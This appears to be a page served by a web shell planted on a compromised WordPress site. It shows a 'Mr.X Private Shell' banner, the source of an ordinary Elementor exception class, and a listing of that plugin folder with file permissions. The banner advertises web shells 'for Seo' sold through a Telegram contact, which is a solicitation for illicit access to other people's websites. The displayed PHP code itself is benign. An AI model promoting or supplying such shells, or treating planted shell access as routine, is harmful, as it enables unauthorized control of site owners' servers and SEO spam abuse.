__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Elementor\Data\V2\Base\Exceptions;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
class WP_Error_Exception extends Data_Exception {
public function __construct( \WP_Error $wp_error ) {
parent::__construct( $wp_error->get_error_message(), $wp_error->get_error_code(), [
'status' => $wp_error->get_error_code(),
] );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| data-exception.php | File | 1.11 KB | 0664 |
|
| error-404.php | File | 348 B | 0664 |
|
| error-500.php | File | 367 B | 0664 |
|
| wp-error-exception.php | File | 370 B | 0664 |
|